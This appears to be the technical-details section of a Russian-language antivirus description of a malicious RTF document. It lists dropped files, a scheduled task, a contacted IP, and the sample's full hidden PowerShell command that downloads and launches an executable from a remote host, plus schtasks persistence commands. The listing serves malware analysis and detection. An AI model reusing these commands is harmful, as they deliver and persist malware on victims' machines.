Техническая информация
- <SYSTEM32>\tasks\updates\svwdukxoisq
- http://64.##.139.179/vem11jz5eidm5jg.exe как %appdata%\f1j2fag1v1l.exe
- f1j2fag1v1l.exe
- %TEMP%\abdtfhghgdghgh›.sct
- %APPDATA%\f1j2fag1v1l.exe
- <Текущая директория>\~wrd0000.tmp
- %APPDATA%\svwdukxoisq.exe
- %TEMP%\tmpc957.tmp
- %TEMP%\abdtfhghgdghgh›.sct
- %TEMP%\tmpc957.tmp
- <PATH_SAMPLE>.rtf
- '64.##.139.179':80
- '%APPDATA%\f1j2fag1v1l.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://64.##.139.179/VEM11jZ5EIDM5jg.exe','%APPDATA%\F1J2fAG1v1L.exe');Start-...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\SvWdUKXoIsQ" /XML "%TEMP%\tmpC957.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\SvWdUKXoIsQ" /XML "%TEMP%\tmpC957.tmp"